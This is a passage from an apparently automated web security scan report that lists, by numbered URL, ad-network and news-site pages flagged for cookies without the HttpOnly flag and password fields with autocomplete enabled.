11.188. http://u-ads.adap.tv/a/h/HuqeLZgU_XaX8g16tMn8bSkO7yiAt1QCn5DKEyqYSJq69nbfVmH21Q==

11.189. http://u-ads.adap.tv/a/h/HuqeLZgU_Xbwoj9zW9AgbDCxmf2_Fc99

11.190. http://usadmm.dotomi.com/dmm/servlet/dmm

11.191. http://vads.adbrite.com/vast/adserver

11.192. http://vlog.leadforce1.com/bf/bf.php

11.193. http://www.att.com/u-verse/availability/

11.194. http://www.bradsdeals.com/dealsoftheday/subscribe/b

11.195. http://www.giganews.com/

11.196. http://www.giganews.com/s/google/nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact

11.197. http://www.google.com/sorry/

11.198. http://www.google.com/sorry/Captcha

11.199. http://www.nntpserver.com/gl/

12. Cookie without HttpOnly flag set

12.1. http://ads.adxpose.com/ads/ads.js

12.2. http://afe.specificclick.net/

12.3. http://alerts.4info.com/alert/ads/dispatcher.jsp

12.4. http://alerts.4info.com/alert/ads/fastTrackAlerts.js

12.5. http://blekko.com/a/e

12.6. http://blekko.com/a/favicon

12.7. http://blekko.com/a/track

12.8. http://blekko.com/autocomplete

12.9. http://event.adxpose.com/event.flow

12.10. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

12.11. http://pixel.adsafeprotected.com/jspix

12.12. http://sales.liveperson.net/visitor/addons/deploy.asp

12.13. http://www-304.ibm.com/support/operations/us/en/orderdelivery

12.14. http://www.ibm.com/developerworks/forums/comment.jspa

12.15. http://www.ibm.com/developerworks/utils/ratingJSON.jsp

12.16. http://www.mailjet.com/

12.17. http://www.mailjet.com/pricing

12.18. https://www.mailjet.com/signup

12.19. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/

12.20. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/

12.21. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/

12.22. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/

12.23. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/

12.24. http://www.tmz.com/reset-password/

12.25. http://www.tmz.com/signin/

12.26. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/

12.27. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/

12.28. http://www.toofab.com/category/celeb-couples/

12.29. http://www.toofab.com/news/

12.30. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp

12.31. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp

12.32. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp

12.33. http://27.xg4ken.com/media/redir.php

12.34. http://2912a.v.fwmrm.net/ad/l/1

12.35. http://2912a.v.fwmrm.net/ad/l/1

12.36. http://2912a.v.fwmrm.net/ad/l/1

12.37. http://2912a.v.fwmrm.net/ad/p/1

12.38. http://a.collective-media.net/adj/cm.rev_bostonherald/

12.39. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience

12.40. http://a.collective-media.net/adj/q1.bosherald/be_news

12.41. http://a.collective-media.net/adj/q1.bosherald/ent_fr

12.42. http://a.collective-media.net/adj/q1.bosherald/news

12.43. http://a.collective-media.net/cmadj/cm.rev_bostonherald/

12.44. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience

12.45. http://a.collective-media.net/cmadj/q1.bosherald/be_news

12.46. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr

12.47. http://a.collective-media.net/cmadj/q1.bosherald/news

12.48. http://a.tribalfusion.com/i.cid

12.49. http://a.tribalfusion.com/j.ad

12.50. http://a.tribalfusion.com/z/i.cid

12.51. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.2

12.52. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.3

12.53. http://ad.doubleclick.net/adj/q1.bosherald/be_news

12.54. http://ad.doubleclick.net/adj/q1.bosherald/news

12.55. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_hookups

12.56. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_justice

12.57. http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/w%3B245892120%3B0-0%3B0%3B69485624%3B4986-300/600%3B43918246/43936033/1%3B%3B~okv%3D%3Bpc%3DDFP245079213%3B%3B~fdr%3D245079213%3B0-0%3B0%3B61866028%3B4986-300/600%3B44072410/44090197/1%3B%3B~sscs%3D%3fhttp://t.mookie1.com/t/v1/clk

12.58. http://ad.yieldmanager.com/imp

12.59. http://ad.yieldmanager.com/pixel

12.60. http://ads.lucidmedia.com/clicksense/pixel

12.61. http://adserver.teracent.net/tase/ad

12.62. http://adserver.teracent.net/tase/redir/1316221519820_135153353_as3104_imp/vew

12.63. http://adserver.teracent.net/tase/redir/1316221548433_135109402_as3106_imp/vew

12.64. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php

12.65. http://apis.google.com/js/plusone.js

12.66. http://ar.voicefive.com/b/recruitBeacon.pli

12.67. http://ar.voicefive.com/b/wc_beacon.pli

12.68. http://ar.voicefive.com/bmx3/broker.pli

12.69. http://attuverseoffers.com/tv_hsi_bundles/index.php

12.70. http://b.scorecardresearch.com/b

12.71. http://b.scorecardresearch.com/p

12.72. http://b.scorecardresearch.com/r

12.73. http://b.voicefive.com/b

12.74. http://b.voicefive.com/p

12.75. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2

12.76. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0

12.77. http://bostonheraldnie.newspaperdirect.com/epaper/viewer.aspx

12.78. http://c.statcounter.com/t.php

12.79. http://cdnt.meteorsolutions.com/api/setid

12.80. http://cdnt.meteorsolutions.com/api/track

12.81. http://cdnt.meteorsolutions.com/api/track

12.82. http://clk.atdmt.com/go/335787632/direct

12.83. http://cpanel.app9.hubspot.com/salog.js.aspx

12.84. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js

12.85. http://d7.zedo.com/img/bh.gif

12.86. http://d7.zedo.com/utils/ecSet.js

12.87. http://dc.tremormedia.com/comp.gif

12.88. http://dc.tremormedia.com/crossdomain.xml

12.89. http://dc.tremormedia.com/st.gif

12.90. http://forums.cpanel.net/calendar.php

12.91. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html

12.92. http://g2.gumgum.com/services/get

12.93. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1030885431/

12.94. http://i.w55c.net/a.gif

12.95. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard

12.96. http://image2.pubmatic.com/AdServer/Pug

12.97. http://imp.fetchback.com/serve/fb/adtag.js

12.98. http://imp.fetchback.com/serve/fb/imp

12.99. http://info.mailtraq.com/142/

12.100. http://info.mailtraq.com/716/

12.101. http://info.mailtraq.com/imap

12.102. http://info.mailtraq.com/wac

12.103. http://leadback.advertising.com/adcedge/lb

12.104. http://leadback.advertising.com/adcedge/lb

12.105. http://livechat.iadvize.com/chat_init.js

12.106. http://livechat.iadvize.com/rpc/referrer.php

12.107. http://loadm.exelator.com/load/

12.108. http://log.go.com/log

12.109. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Bottom

12.110. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle

12.111. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1

12.112. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top

12.113. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom

12.114. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle

12.115. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1

12.116. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top

12.117. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@x01!x01

12.118. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Bottom

12.119. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle

12.120. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top

12.121. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@x01!x01

12.122. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

12.123. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

12.124. http://odb.outbrain.com/utils/get

12.125. http://omg.yahoo.com/photos/what-were-they-thinking/5203

12.126. http://ping.crowdscience.com/ping.js

12.127. http://q1.checkm8.com/adam/detect

12.128. http://q1.checkm8.com/adam/report

12.129. http://r.turn.com/r/beacon

12.130. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/

12.131. http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653

12.132. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13141172/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome

12.133. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13161297/hr=1/hl=11/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CBottom%2526page%253Dbh.heraldinteractive.com%25252F%252Fyour_tax_dollars_at_work

12.134. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13485129/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle

12.135. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=14907432/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome

12.136. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=39615410/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome

12.137. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=4347768/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome

12.138. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=71688841/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

12.139. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=73068085/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

12.140. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=87670031/hr=1/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome

12.141. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=15131969/hr=1/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fregional%25252Farticle

12.142. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=36701179/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

12.143. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=3823857/hr=1/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fcolumnists%25252Farticle

12.144. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=4214348/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle

12.145. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=94471246/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

12.146. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=1532848/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome

12.147. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=19365718/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome

12.148. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=2205187/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome

12.149. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=73177346/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome

12.150. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=4256658/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tmz.com%252F2011%252F09%252F16%252Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%252F%253Fadid%253Dhero1

12.151. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

12.152. http://r1-ads.ace.advertising.com/site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D

12.153. http://receive.inplay.tubemogul.com/StreamReceiver/services

12.154. http://rs.gwallet.com/r1/pixel/x420r2425801

12.155. http://rt.legolas-media.com/lgrt

12.156. http://rt1302.infolinks.com/action/doq.htm

12.157. http://rt1701.infolinks.com/action/doq.htm

12.158. http://rt1702.infolinks.com/action/doq.htm

12.159. http://rt1803.infolinks.com/action/doq.htm

12.160. http://rt1804.infolinks.com/action/doq.htm

12.161. http://rt1901.infolinks.com/action/doq.htm

12.162. http://rt1903.infolinks.com/action/doq.htm

12.163. http://sales.liveperson.net/hc/25199332/

12.164. http://sales.liveperson.net/hc/25199332/

12.165. http://search.yahoo.com/search

12.166. http://sensor2.suitesmart.com/sensor4.js

12.167. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.168. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.169. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.170. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.171. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.172. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.173. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.174. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.175. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.176. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.177. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.178. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.179. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.180. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.181. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.182. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.183. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.184. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.185. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.186. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.187. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.188. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.189. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.190. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.191. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.192. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.193. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.194. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.195. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.196. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.197. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.198. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.199. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.200. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.201. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.202. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.203. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.204. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.205. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.206. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.207. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.208. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.209. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.210. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.211. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.212. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.213. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.214. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.215. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.216. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.217. http://tag.admeld.com/ad/iframe/221/tmz/728x90/homepage_btf

12.218. http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782

12.219. http://tag.admeld.com/ad/js/221/tmz/300x250/af-top-right

12.220. http://tag.admeld.com/ad/js/221/tmz/300x250/af-top-right-2

12.221. http://tag.admeld.com/ad/js/221/tmz/300x250/bf-top-right

12.222. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_atf

12.223. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_atf_2

12.224. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_btf_rr

12.225. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_btf_rr_2

12.226. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_inpost

12.227. http://tag.admeld.com/ad/js/221/tmz/300x250/ros_inpage

12.228. http://tag.admeld.com/ad/js/221/tmz/300x250/toofab_ros

12.229. http://tag.admeld.com/ad/js/221/tmz/728x90/homepage_atf

12.230. http://tag.admeld.com/ad/js/221/tmz/728x90/ros

12.231. http://tag.admeld.com/ad/js/221/tmz/728x90/toofab_ros

12.232. http://tag.admeld.com/ad/js/610/unified/300x250/bh_656864_29757991

12.233. http://tag.admeld.com/match

12.234. http://tag.admeld.com/passback/iframe/221/tmz/300x250/6/meld.html

12.235. http://tag.admeld.com/passback/iframe/221/tmz/728x90/6/meld.html

12.236. http://tag.admeld.com/passback/js/221/tmz/300x250/28/meld.js

12.237. http://tag.admeld.com/passback/js/221/tmz/300x250/49/meld.js

12.238. http://tag.admeld.com/passback/js/221/tmz/728x90/28/meld.js

12.239. http://tag.admeld.com/passback/js/221/tmz/728x90/49/meld.js

12.240. http://tag.admeld.com/passback/js/610/unified/300x250/8/meld.js

12.241. http://tag.contextweb.com/TagPublish/GetAd.aspx

12.242. http://tag.contextweb.com/TagPublish/GetAd.aspx

12.243. http://tenzing.fmpub.net/

12.244. http://testdm.travelers.com/trvwics.gif

12.245. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FPhotoSlideShow%2FYAHOO_143_B2C_Mail_Expandable_954x60%2CC%3DMail%2CP%3DYahoo%2CK%3D3078101/0.9137649598997086/0/in%2Cti/ti.gif

12.246. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.21918878913857043/0/in%2Cti/ti.gif

12.247. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.3687601247802377/0/in%2Cti/ti.gif

12.248. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.558339134324342/0/in%2Cti/ti.gif

12.249. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.9227102545555681/0/in%2Cti/ti.gif

12.250. http://traffic.outbrain.com/network/redir

12.251. http://u-ads.adap.tv/a/h/HuqeLZgU_XaX8g16tMn8bSkO7yiAt1QCn5DKEyqYSJq69nbfVmH21Q==

12.252. http://u-ads.adap.tv/a/h/HuqeLZgU_Xbwoj9zW9AgbDCxmf2_Fc99

12.253. http://usadmm.dotomi.com/dmm/servlet/dmm

12.254. http://usenetjunction.com/scripts/track.php

12.255. http://vads.adbrite.com/vast/adserver

12.256. http://vlog.leadforce1.com/bf/bf.php

12.257. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif

12.258. http://www.att.com/u-verse/availability/

12.259. http://www.bradsdeals.com/dealsoftheday/subscribe/b

12.260. http://www.elfqrin.com/hacklab/pages/nntpserv.php

12.261. http://www.enstarllc.com/

12.262. http://www.giganews.com/

12.263. http://www.giganews.com/s/google/nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact

12.264. http://www.google.com/sorry/

12.265. http://www.google.com/sorry/Captcha

12.266. http://www.googleadservices.com/pagead/aclk

12.267. http://www.ibm.com/search/csass/search

12.268. http://www.ibm.com/search/csass/search/

12.269. http://www.mailtraq.com/30day

12.270. http://www.nntpserver.com/gl/

12.271. http://www.websitealive2.com/89/Visitor/vTracker_v2.asp

13. Password field with autocomplete enabled

13.1. http://dw1.s81c.com/common/js/dynamicnav.js

13.2. http://forums.cpanel.net/calendar.php

13.3. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html

13.4. http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html

13.5. http://jcp.org/en/jsr/all

13.6. http://www.actvalue.com/

13.7. http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp

13.8. http://www.easynews.com/

13.9. http://www.easynews.com/whyeasynews.html

13.10. https://www.easynews.com/signup/

13.11. http://www.giganews.com/

13.12. https://www.giganews.com/signup/

13.13. https://www.giganews.com/signup/billing.html

13.14. http://www.ibm.com/common/js/dynamicnav.js

13.15. http://www.ibm.com/developerworks/java/

13.16. http://www.ibm.com/developerworks/java/find/standards/

13.17. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html

